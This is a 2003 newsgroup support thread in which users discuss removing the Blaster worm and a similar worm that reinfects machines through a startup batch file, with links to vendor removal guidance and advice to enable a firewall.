Good Morning,

I have downloaded the patch for the virus. But I would
like to know, how can I check if its gone? And how did
this attach my computer, was it something I downloaded?

Thanks in advance for your help.
Zuly

Zuly --

Read and follow the procedures outlined in the following articles:

What You Should Know About the Blaster Worm
http://www.microsoft.com/security/incident/blast.asp=20

W32.Blaster.Worm Removal Tool
http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.=
removal.tool.html

MS03-026: Buffer Overrun in RPC Interface May Allow Code Execution
http://support.microsoft.com/?kbid=3D823980

**** You need to make sure you have a FIREWALL enabled ****

Open XP's "Help and Support" and type: FIREWALL , and hit enter.
Click on the topic titled "Enable or Disable Internet Connection =
Firewall".

Essential Security Tools for Home Office Users
http://www.microsoft.com/technet/treeview/default.asp?url=3D/technet/colu=
mns/security/5min/5min-105.asp=20

Last, but not least, consider purchasing and installing a good
internet security package, such as:

Norton Internet Security 2003
http://www.symantec.com/sabu/nis/nis_pe/

-- Includes Norton AntiVirus 2003
-- Includes Norton Personal Firewall
-- Includes prevention of annoying web pop-ups
-- Includes Parental Controls
-- All in one, easy-to-install & manage package


--=20
Nicholas

---------------------------------------------------------------------

"Zuly" > wrote in message:
...

| Good Morning,=20
|=20
| I have downloaded the patch for the virus. But I would=20
| like to know, how can I check if its gone? And how did=20
| this attach my computer, was it something I downloaded?
|=20
| Thanks in advance for your help.
| Zuly

Nicholas:

There is another worm that is similar but it isn't
Blaster. It may be a test run for Blaster or one we
haven't seen yet. I ran accross a couple of people on
computing.net that were struggling with this one. It hit
me on 08/08 but I believe my system was first compromised
on 08/01/03.

This one runs a program msconfig35.exe that automatically
closes regedit, taskman and msconfig when you try to run
them. A root.bat file is placed in the XP All Users start
up folder that uses tftp to connect to a remote system and
remotely run Server2.exe everytime you reboot and connect
to the internet, hence, reinfecting your system. For
those that are not having success after attempting to
remove Blaster check System Tools - System Information -
Software Environment - Running Tasks (that one still
worked) for msconfig35.exe and root.bat and move them to a
new folder then reboot. Firewall software will block the
ftp port so that you do not get reinfected.

Glenn Skorko
Cleveland, Ohio USA
>-----Original Message-----
>Zuly --
>
>Read and follow the procedures outlined in the following
articles:
>
>What You Should Know About the Blaster Worm
>http://www.microsoft.com/security/incident/blast.asp
>
>W32.Blaster.Worm Removal Tool
>http://securityresponse.symantec.com/avcenter/venc/data/w3
2.blaster.worm.removal.tool.html
>
>MS03-026: Buffer Overrun in RPC Interface May Allow Code
Execution
>http://support.microsoft.com/?kbid=823980
>
>**** You need to make sure you have a FIREWALL enabled
****
>
>Open XP's "Help and Support" and type: FIREWALL , and
hit enter.
>Click on the topic titled "Enable or Disable Internet
Connection Firewall".
>
>Essential Security Tools for Home Office Users
>http://www.microsoft.com/technet/treeview/default.asp?
url=/technet/columns/security/5min/5min-105.asp
>
>Last, but not least, consider purchasing and installing a
good
>internet security package, such as:
>
>Norton Internet Security 2003
>http://www.symantec.com/sabu/nis/nis_pe/
>
>-- Includes Norton AntiVirus 2003
>-- Includes Norton Personal Firewall
>-- Includes prevention of annoying web pop-ups
>-- Includes Parental Controls
>-- All in one, easy-to-install & manage package
>
>
>--
>Nicholas
>
>----------------------------------------------------------
-----------
>
>"Zuly" > wrote in message:
> ...
>
>| Good Morning,
>|
>| I have downloaded the patch for the virus. But I would
>| like to know, how can I check if its gone? And how did
>| this attach my computer, was it something I downloaded?
>|
>| Thanks in advance for your help.
>| Zuly
>.
>